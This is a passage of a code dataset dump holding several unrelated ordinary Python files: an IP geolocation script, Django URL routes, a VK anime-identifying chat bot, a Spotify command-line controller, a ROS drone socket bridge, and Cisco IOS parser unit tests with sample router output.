re\nfrom pyquery import PyQuery as pq\nimport json\n\ndef QueryIPJson(IP):\n try:\n if IP == None:\n return\n url = 'http://ip-api.com/json/'+str(IP)+'?lang=en'\n response = requests.get(url)\n response.encoding = 'utf8'\n html = response.text\n ipjson = json.loads(html)\n print(\"Location:\",ipjson['country'])\n return ipjson\n except:\n print(\"Location IP Fail\")\n \ndef LocateIP(IP):\n try:\n if IP == None:\n return\n #url = 'http://www.ip138.com/ips1388.asp?ip=' + str(IP) + '&action=2'\n url = 'http://www.882667.com/ip_'+str(IP)+\".html\"\n response = requests.get(url)\n response.encoding = 'gbk'\n html = response.text\n #print(html)\n doc = pq(html)\n temp = doc('body div div div:nth-child(4) .shenlansezi')\n #print(temp)\n location=re.findall(\".*zi\\\">(.*?)<\",str(temp))[0]\n print(\"Location:\",location)\n return location\n except:\n print(\"Location IP Fail\")\n\n \nif __name__ == '__main__':\n IP = '144.34.158.30'\n #LocateIP(IP)\n QueryIPJson(IP)\n", "sub_path": "LocateIP.py", "file_name": "LocateIP.py", "file_ext": "py", "file_size_in_byte": 1252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "323801207", "text": "from django.conf.urls import patterns, url\nfrom green import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^about', views.about, name='about'),\n\t url(r'^home', views.home, name='home'),\n url(r'^pdf', views.export_to_pdf, name='export_to_pdf'),\n\n\n\n )\n", "sub_path": "green/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "green.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "green.views.about", "line_number": 6, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "green.views.home", "line_number": 7, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "green.views.export_to_pdf", "line_number": 8, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "176181184", "text": "import vk\nimport requests\nimport urllib\nimport base64 \nimport json\nimport config\nimport time\nimport datetime\nimport os.path\n\ndef convert_to_base64(img_file_name):\n\treturn req_encode(base64.encodestring(open(img_file_name,\"rb\").read()))\n\ndef req_encode(str_file):\n\treturn str_file\n\ndef whatAnimeRequest(img):\n\theaders = {\n\t'X-Requested-With': 'XMLHttpRequest',\n\t'Refer': 'https://whatanime.ga/',\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'\n\t}\n\tr = requests.post('https://whatanime.ga/search', data={'data': convert_to_base64(img)}, headers=headers)\n\tif (r.status_code != 200):\n\t\treturn 0\n\tif (len(r.json()['docs']) < 1):\n\t\treturn 1\n\treturn r.json()['docs'][0]\n\ndef getAnimeInfoMsg(animeInfo):\n\tsimilarity = 100 - animeInfo['diff']\n\tif (animeInfo == 0):\n\t\treturn \"Server error. Try again later.\"\n\tif (animeInfo == 1 or similarity <= 88):\n\t\treturn \"I don't know this anime, b-baka!\"\n\tmessage = animeInfo['title'] + '\\n\\r' + animeInfo['anime'] + '\\n\\r' + animeInfo['title_english'] + '\\n\\r'\n\tmessage = message + 'EP#' + str(animeInfo['episode']).zfill(2) + ' ' + str(datetime.timedelta(seconds=animeInfo['from'])).split('.')[0] + '\\n\\r'\n\tmessage = message + ('%.2f' % similarity) + '% similarity\\n\\r'\n\treturn message\n\ndef getItemFromFwdMessage(fwd):\n\tif ('fwd_messages' not in fwd):\n\t\treturn fwd\n\treturn getItemFromFwdMessage(fwd['fwd_messages'][0])\n\nlast_message_id = 0\nif os.path.isfile('last'):\n\tfile = open(\"last\", \"r\")\n\tlast_message_id = int(file.read())\n\tfile.close()\n\nconfig = json.load(open('config.json')) \nsession = vk.Session()\napi = vk.API(session, v='5.62', lang='ru', timeout=10)\n\nwhile 1:\n\ttime.sleep(9)\n\tif (last_message_id):\n\t\tr = api.messages.get(access_token=config['vk_access_token'], count=20, last_message_id=last_message_id)\n\telse:\n\t\tr = api.messages.get(access_token=config['vk_access_token'], count=20)\n\tif (len(r['items']) < 1):\n\t\tcontinue\n\tlast_message_id = r['items'][0]['id']\n\tfor item in r['items']:\n\t\tmessage = getItemFromFwdMessage(item)\n\t\tif (item['body'][:13] != \"[id391181538|\" or 'attachments' not in message or 'chat_id' not in item):\n\t\t\tcontinue\n\t\tfor photoAttach in message['attachments']:\n\t\t\tif photoAttach['type'] == 'photo':\n\t\t\t\tpic = photoAttach['photo']\n\t\t\t\tbreak\n\t\t# if not pic:\n\t\t# \tcontinue\n\t\tphs = []\n\t\tfor (ph, url) in pic.items():\n\t\t\tif 'photo' in ph:\n\t\t\t\tphs.append(ph)\n\t\turl = pic[min(phs)]\n\t\timage_file = \"./pic/\"+str(int(time.time()))+'.'+url.split('.')[-1]\n\t\turllib.request.urlretrieve(url, image_file)\n\t\tanimeInfo = whatAnimeRequest(image_file)\n\t\tmsg = getAnimeInfoMsg(animeInfo)\n\t\ttime.sleep(1)\n\t\tres = api.messages.send(access_token=config['vk_access_token'], forward_messages=item['id'], chat_id=item['chat_id'], message=msg)\n\t\tprint(res)\n\tfile = open(\"last\", \"w\")\n\tfile.write(str(last_message_id))\n\tfile.close()\n\n", "sub_path": "whatAnimeVk.py", "file_name": "whatAnimeVk.py", "file_ext": "py", "file_size_in_byte": 2852, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "base64.encodestring", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 47, "usage_type": "name"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "vk.Session", "line_number": 53, "usage_type": "call"}, {"api_name": "vk.API", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 81, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "610747032", "text": "import time\nimport sys\nfrom time import sleep\nfrom subprocess import Popen, PIPE\n\nimport click\nimport requests\n\n\n@click.group()\ndef main():\n print(\n ' ################################################################')\n print(\n ' # #')\n print(\n ' # ____ __ #')\n print(\n ' # /\\ _`\\ /\\ \\__ __ #')\n print(\n ' # \\ \\,\\L\\_\\ _____ ___\\ \\ ,_\\/\\_\\ _____ __ __ #')\n print(\n ' # \\/_\\__ \\ /\\ \\'__`\\ / __`\\ \\ \\/\\/\\ \\/\\ \\'__`\\/\\ \\/\\ \\ #')\n print(\n ' # /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\ \\ \\ \\_\\ \\ \\ \\ \\L\\ \\ \\ \\_\\ \\ #')\n print(\n ' # \\ `\\____\\ \\ ,__/\\ \\____/\\ \\__\\\\ \\_\\ \\ ,__/\\/`____ \\ #')\n print(\n ' # \\/_____/\\ \\ \\/ \\/___/ \\/__/ \\/_/\\ \\ \\/ `/___/> \\ #')\n print(\n ' # \\ \\_\\ \\ \\_\\ /\\___/ #')\n print(\n ' # \\/_/ \\/_/ \\/__/ #')\n print(\n ' # #')\n print(\n ' # #')\n print(\n ' # by bjarneo #')\n print(\n ' # #')\n print(\n ' ################################################################\\n')\n\n\ndef osascript(command):\n '''Run apple script command.'''\n p = Popen(\n ['osascript', '-e', 'tell app \"Spotify\" to {}'.format(command)],\n stdout=PIPE, stderr=PIPE)\n # get stdout and stderr\n output, err = p.communicate()\n # strip text and decode to unicode\n output = output.strip().decode('utf-8')\n return output\n\n\n@main.command()\n@click.argument('query')\ndef search(query):\n '''Search for song then play it.'''\n # call track api to search for songs\n url = 'https://ws.spotify.com/search/1/track.json'\n # get results\n datas = requests.get(url, params={'q': query}).json()\n\n # define string format for each row\n space = '{:^4} | {:^25} | {:^40} | {:^25}'\n\n # print header\n print(space.format('#', 'Artist', 'Song', 'Album'))\n # print divider\n print(space.format('-' * 4, '-' * 25, '-' * 40, '-' * 25))\n\n # print each song\n for i, track in enumerate(datas['tracks']):\n print(space.format(\n i, track['artists'][0]['name'][:25], track['name'][:40],\n track['album']['name'][:25]))\n\n # sleep 0.01 second for sexy print\n time.sleep(0.01)\n\n # ask user which one he/she wants\n index = input('\\nWhich one do you want to listen? ')\n\n # get result and convert it to integer\n try:\n index = int(index)\n except ValueError:\n print('Index should be integer.')\n sys.exit(1)\n\n # call apple script to play the specific song\n try:\n osascript('play track \"{}\"'.format(datas['tracks'][index]['href']))\n print('Playing now: {}'.format(datas['tracks'][index]['name']))\n except IndexError:\n # in case of user enters a invalid index\n print('Play for nothing')\n sys.exit(1)\n\n\n@main.command()\ndef next():\n '''Play next song.'''\n osascript('next track')\n print('Next track')\n\n\n@main.command()\ndef previous():\n '''Play previous song.'''\n osascript('previous track')\n print('Previous track')\n\n\n@main.command()\ndef playpause():\n '''Play or pause current song.'''\n osascript('playpause')\n print('Playpause track')\n\n\n@main.command()\ndef volume():\n '''The sound volume set in Spotify (0-100).'''\n output = osascript('get sound volume')\n print('Current volume:', output)\n\n\n@main.command()\n@click.argument('volume')\ndef set_volume(volume):\n '''Set spotify sound volume (0-100).'''\n osascript('set sound volume to {}'.format(volume))\n print('Current volume:', volume)\n\n\n@main.command()\ndef state():\n '''Stopped, playing, or paused.'''\n output = osascript('get player state')\n print('Player state:', output)\n\n\n@main.command()\ndef position():\n '''The curret position (in seconds) of the current song playing.'''\n output = osascript('get player position')\n print('Player position:', output)\n\n\n@main.command()\n@click.argument('position')\ndef set_position(position):\n '''Set track position (in seconds) of the current song.'''\n osascript('set player position to {}'.format(position))\n print('Player position:', position)\n\n\n@main.command()\ndef repeat():\n '''Is repeating enabled or disabled (boolean value)'''\n output = osascript('get repeating')\n print('Repeat:', output)\n\n\n@main.command()\ndef toggle_repeat():\n '''Toggle repeat option.'''\n # get current repeat status\n output = osascript('get repeating')\n\n if 'true' == output:\n # if true then set repeating to false\n osascript('set repeating to false')\n print('Repeat: false')\n else:\n # if true then set repeating to true\n osascript('set repeating to true')\n print('Repeat: true')\n\n\n@main.command()\n@click.argument('repeat')\ndef set_repeat(repeat):\n '''Set repeat option.'''\n osascript('set repeating to {}'.format(repeat))\n print('Repeat:', repeat)\n\n\n@main.command()\ndef shuffle():\n '''Is shuffling enabled or disabled (boolean value).'''\n output = osascript('get shuffling')\n print('Shuffle:', output)\n\n\n@main.command()\ndef toggle_shuffle():\n '''Toggle shuffle option.'''\n # get current shuffle status\n output = osascript('get shuffling')\n\n if 'true' == output:\n # if true then set shuffle to false\n osascript('set shuffling to false')\n print('Shuffle: false')\n else:\n # if true then set shuffle to true\n osascript('set shuffling to true')\n print('Shuffle: true')\n\n\n@main.command()\n@click.argument('shuffle')\ndef set_shuffle(shuffle):\n '''Set shuffle option.'''\n osascript('set shuffling to {}'.format(shuffle))\n print('Shuffle:', shuffle)\n\n\n@main.command()\ndef track():\n '''Print current track info.'''\n infos = [\n ('Artist', osascript('get artist of current track')),\n ('Album', osascript('get album of current track')),\n ('Disc number', osascript('get disc number of current track')),\n ('Duration', osascript('get duration of current track')),\n ('Played count', osascript('get played count of current track')),\n ('Track number', osascript('get track number of current track')),\n ('Starred', osascript('get starred of current track')),\n ('Popularity', osascript('get popularity of current track')),\n ('Track Id', osascript('get id of current track')),\n ('Name', osascript('get name of current track')),\n # ('artwork', osascript('get artwork of current track')),\n ('Album artist', osascript('get album artist of current track')),\n ('Url', osascript('get spotify url of current track')),\n ]\n\n # define row string format\n row = '{:12}: {}'\n for k, v in infos:\n print(row.format(k, v))\n\n\n@main.command()\ndef current():\n '''Continuously getting current track, and check this is a new track.'''\n # save old track url\n old_url = ''\n\n # check current_url is the same as old_url\n while True:\n # get current track url\n current_url = osascript('get spotify url of current track')\n\n # if current_url is not the same as old_url,\n # send message to facebook group\n if current_url != old_url:\n # call track api to retrieve track info\n url = 'https://api.spotify.com/v1/tracks/{}'.format(\n current_url.split(':')[-1])\n res = requests.get(url)\n datas = res.json()\n\n print('Now playing: {}'.format(datas['name']))\n\n # update old_url with current_url\n old_url = current_url\n\n # sleep for 0.1 second\n sleep(0.1)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "cool.py", "file_name": "cool.py", "file_ext": "py", "file_size_in_byte": 8071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.group", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 50, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 59, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 133, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 155, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 186, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 217, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "413932347", "text": "#!/usr/bin/env python\nimport rospy\nimport sys\nimport json\nfrom guide_flight import guide\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom std_msgs.msg import Empty\n\nclass socket:\n\n def __init__(self):\n self.pub_takeoff = rospy.Publisher('/bebop/takeoff', Empty, queue_size=10)\n self.pub_land = rospy.Publisher('/bebop/land', Empty, queue_size=10)\n self.pub_emgland = rospy.Publisher('/bebop/reset', Empty, queue_size=10)\n self.startSocket()\n\n def startSocket(self):\n self.sio = SocketIO('fyp.joelwalker.co.uk', 3000, BaseNamespace)\n self.sio.on('connected', self.on_connected)\n self.sio.on('updateDronePos', self.on_updatePos)\n self.sio.on('takeoff', self.on_takeoff)\n self.sio.on('landing', self.on_landing)\n self.sio.on('emgLanding', self.on_emgLanding)\n self.sio.emit('connected')\n self.sio.wait()\n\n def on_connected(self, *args):\n print (\"Socket Connected\")\n\n def on_updatePos(self, *args):\n dataj = json.loads(json.dumps(args))[0]\n\n latitude = dataj['latitude']\n longitude = dataj['longitude']\n print(\"New Node\")\n print(\"lat: \" + str(latitude))\n print(\"long: \" + str(longitude))\n\n node = guide(latitude, longitude)\n\n\n def on_takeoff(self, args):\n print(\"takeoff\")\n self.pub_takeoff.publish(Empty())\n\n def on_landing(self, args):\n print(\"land\")\n self.pub_land.publish(Empty())\n\n def on_emgLanding(self, args):\n print(\"EMG LANDING\")\n self.pub_emgland.publish(Empty())\n\n\n\n\n\n\ndef main(args):\n try:\n rospy.init_node('bebop_socket')\n rospy.spin()\n except KeyboardInterrupt:\n\n rospy.signal_shutdown('Bye')\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n", "sub_path": "src/bebop_fyp/scripts/socket_drone.py", "file_name": "socket_drone.py", "file_ext": "py", "file_size_in_byte": 1791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rospy.Publisher", "line_number": 12, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 12, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 13, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 13, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 14, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 14, "usage_type": "argument"}, {"api_name": "socketIO_client.SocketIO", "line_number": 18, "usage_type": "call"}, {"api_name": "socketIO_client.BaseNamespace", "line_number": 18, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "guide_flight.guide", "line_number": 39, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 44, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 48, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 52, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 61, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 62, "usage_type": "call"}, {"api_name": "rospy.signal_shutdown", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}]} +{"seq_id": "640646296", "text": "import unittest\nimport genie.gre\nfrom unittest.mock import Mock\nfrom pyats.topology import Device\n\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError, \\\n SchemaMissingKeyError\n\n# c7600 show_platform\nfrom genie.libs.parser.ios.c7600.show_platform import (ShowVersion, \n Dir,\n ShowRedundancy,\n ShowInventory,\n ShowModule)\n\nclass TestShowVersion(unittest.TestCase):\n device_empty = Device(name='empty')\n device_c7600 = Device(name='c7600')\n\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 26-Jun-13 02:21 by alnguyen\n\n ROM: System Bootstrap, Version 12.2(17r)SX7, RELEASE SOFTWARE (fc1)\n BOOTLDR: Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n\n ipcore-ssr-uut2 uptime is 22 weeks, 6 days, 2 hours, 1 minute\n Uptime for this control processor is 22 weeks, 6 days, 1 hour, 57 minutes\n System returned to ROM by power cycle at 03:04:03 PDT Thu May 18 2017 (SP by power on)\n System image file is \"disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2\"\n Last reload type: Normal Reload\n Last reload reason: abort at PC 0x433A11BC\n\n\n\n This product contains cryptographic features and is subject to United\n States and local country laws governing import, export, transfer and\n use. Delivery of Cisco cryptographic products does not imply\n third-party authority to import, export, distribute or use encryption.\n Importers, exporters, distributors and users are responsible for\n compliance with U.S. and local country laws. By using this product you\n agree to comply with applicable laws and regulations. If you are unable\n to comply with U.S. and local laws, return this product immediately.\n\n A summary of U.S. laws governing Cisco cryptographic products may be found at:\n http://www.cisco.com/wwl/export/crypto/tool/stqrg.html\n\n If you require further assistance please contact us by sending email to\n export@cisco.com.\n\n cisco CISCO7606 (R7000) processor (revision 1.0) with 983008K/65536K bytes of memory.\n Processor board ID FOX11140RN8\n SR71000 CPU at 600MHz, Implementation 1284, Rev 1.2, 512KB L2 Cache\n Last reset from s/w reset\n 1 Enhanced FlexWAN controller (4 Serial).\n 1 Virtual Ethernet interface\n 52 Gigabit Ethernet interfaces\n 4 Serial interfaces\n 1917K bytes of non-volatile configuration memory.\n 8192K bytes of packet buffer memory.\n\n 65536K bytes of Flash internal SIMM (Sector size 512K).\n Configuration register is 0x2\n\n '''}\n\n parsed_output_c7600 = {\n 'version': {\n 'bootldr_version': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'chassis': 'CISCO7606',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'control_processor_uptime': '22 weeks, 6 days, 1 hour, 57 minutes',\n 'controller': {\n 'counts': 1,\n 'serial': 4,\n 'type': 'Enhanced FlexWAN',\n },\n 'cpu': {\n 'implementation': '1284',\n 'l2_cache': '512KB',\n 'name': 'SR71000',\n 'rev': '1.2',\n 'speed': '600MHz',\n },\n 'curr_config_register': '0x2',\n 'hostname': 'ipcore-ssr-uut2',\n 'image_id': 's72033_rp-ADVENTERPRISEK9_DBG-M',\n 'interfaces': {\n 'gigabit_ethernet': 52,\n 'serial': 4,\n 'virtual_ethernet': 1,\n },\n 'last_reload': {\n 'reason': 'abort at PC 0x433A11BC',\n 'type': 'Normal Reload',\n },\n 'last_reset': 's/w',\n 'main_mem': '983008',\n 'memory': {\n 'flash_internal_SIMM': 65536,\n 'non_volatile_conf': 1917,\n 'packet_buffer': 8192,\n },\n 'os': 'IOS',\n 'platform': 's72033_rp',\n 'processor_board_id': 'FOX11140RN8',\n 'processor_type': 'R7000',\n 'returned_to_rom_by': 'power cycle at 03:04:03 PDT Thu May 18 2017 (SP by power on)',\n 'rom': 'System Bootstrap, Version 12.2(17r)SX7, RELEASE SOFTWARE',\n 'rom_version': '(fc1)',\n 'system_image': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2',\n 'uptime': '22 weeks, 6 days, 2 hours, 1 minute',\n 'version': '15.4(0.10)S',\n },\n }\n\n def test_empty(self):\n self.device_empty = Mock(**self.empty_output)\n obj = ShowVersion(device=self.device_empty)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = obj.parse()\n\n def test_c7600(self):\n self.maxDiff = None\n self.device_c7600 = Mock(**self.output_c7600)\n obj = ShowVersion(device=self.device_c7600)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output_c7600)\n\n\nclass TestDir(unittest.TestCase):\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Directory of disk0:/\n\n 2 -rw- 373 May 9 2013 10:00:08 -07:00 default_config\n 3 -rw- 421 May 9 2013 10:00:20 -07:00 golden_config\n 4 -rw- 188183700 May 9 2013 10:11:56 -07:00 ISSUCleanGolden\n 5 -rw- 210179540 Oct 18 2018 07:22:24 -07:00 s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2\n\n 1024589824 bytes total (626180096 bytes free)\n '''}\n parsed_output = {\n 'dir': {\n 'dir': 'disk0:/',\n 'disk0:/': {\n 'bytes_free': '626180096',\n 'bytes_total': '1024589824',\n 'files': {\n 'ISSUCleanGolden': {\n 'index': '4',\n 'last_modified_date': 'May 9 2013 10:11:56 -07:00',\n 'permissions': '-rw-',\n 'size': '188183700',\n },\n 'default_config': {\n 'index': '2',\n 'last_modified_date': 'May 9 2013 10:00:08 -07:00',\n 'permissions': '-rw-',\n 'size': '373',\n },\n 'golden_config': {\n 'index': '3',\n 'last_modified_date': 'May 9 2013 10:00:20 -07:00',\n 'permissions': '-rw-',\n 'size': '421',\n },\n 's72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2': {\n 'index': '5',\n 'last_modified_date': 'Oct 18 2018 07:22:24 -07:00',\n 'permissions': '-rw-',\n 'size': '210179540',\n },\n },\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = Dir(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n\n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = Dir(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowRedundancy(unittest.TestCase):\n\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Redundant System Information :\n ------------------------------\n Available system uptime = 24 weeks, 6 days, 23 hours, 14 minutes\n Switchovers system experienced = 0\n Standby failures = 0\n Last switchover reason = none\n\n Hardware Mode = Duplex\n Configured Redundancy Mode = sso\n Operating Redundancy Mode = sso\n Maintenance Mode = Disabled\n Communications = Up\n\n Current Processor Information :\n -------------------------------\n Active Location = slot 6\n Current Software state = ACTIVE\n Uptime in current state = 24 weeks, 6 days, 23 hours, 13 minutes\n Image Version = Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 26-Jun-13 02:21 by alnguyen\n BOOT = disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;\n CONFIG_FILE =\n BOOTLDR =\n Configuration register = 0x2\n\n Peer Processor Information :\n ----------------------------\n Standby Location = slot 5\n Current Software state = STANDBY HOT\n Uptime in current state = 4 weeks, 1 day, 22 hours, 47 minutes\n Image Version = Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 26-Jun-13 02:21 by alnguyen\n BOOT = disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;\n CONFIG_FILE =\n BOOTLDR =\n Configuration register = 0x2\n \n '''}\n\n parsed_output = {\n 'red_sys_info': {\n 'available_system_uptime': '24 weeks, 6 days, 23 hours, 14 minutes',\n 'communications': 'Up',\n 'conf_red_mode': 'sso',\n 'hw_mode': 'Duplex',\n 'last_switchover_reason': 'none',\n 'maint_mode': 'Disabled',\n 'oper_red_mode': 'sso',\n 'standby_failures': '0',\n 'switchovers_system_experienced': '0',\n },\n 'slot': {\n 'slot 5': {\n 'boot': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'config_register': '0x2',\n 'curr_sw_state': 'STANDBY HOT',\n 'image_ver': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'uptime_in_curr_state': '4 weeks, 1 day, 22 hours, 47 minutes',\n },\n 'slot 6': {\n 'boot': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'config_register': '0x2',\n 'curr_sw_state': 'ACTIVE',\n 'image_ver': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'uptime_in_curr_state': '24 weeks, 6 days, 23 hours, 13 minutes',\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowRedundancy(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowRedundancy(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowInventory(unittest.TestCase):\n\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n NAME: \"CISCO7606\", DESCR: \"Cisco Systems Cisco 7600 6-slot Chassis System\"\n PID: CISCO7606 , VID: , SN: FOX11140RN8\n\n NAME: \"CLK-7600 1\", DESCR: \"OSR-7600 Clock FRU 1\"\n PID: CLK-7600 , VID: , SN: NWG1112014W\n\n NAME: \"CLK-7600 2\", DESCR: \"OSR-7600 Clock FRU 2\"\n PID: CLK-7600 , VID: , SN: NWG1112014W\n\n NAME: \"module 1\", DESCR: \"WS-X6748-GE-TX CEF720 48 port 10/100/1000mb Ethernet Rev. 2.7\"\n PID: WS-X6748-GE-TX , VID: V02, SN: SAL1209HMW3\n\n NAME: \"switching engine sub-module of 1\", DESCR: \"WS-F6700-CFC Centralized Forwarding Card Rev. 4.0\"\n PID: WS-F6700-CFC , VID: V05, SN: SAL1207G5V1\n\n NAME: \"module 2\", DESCR: \"2 port adapter Enhanced FlexWAN 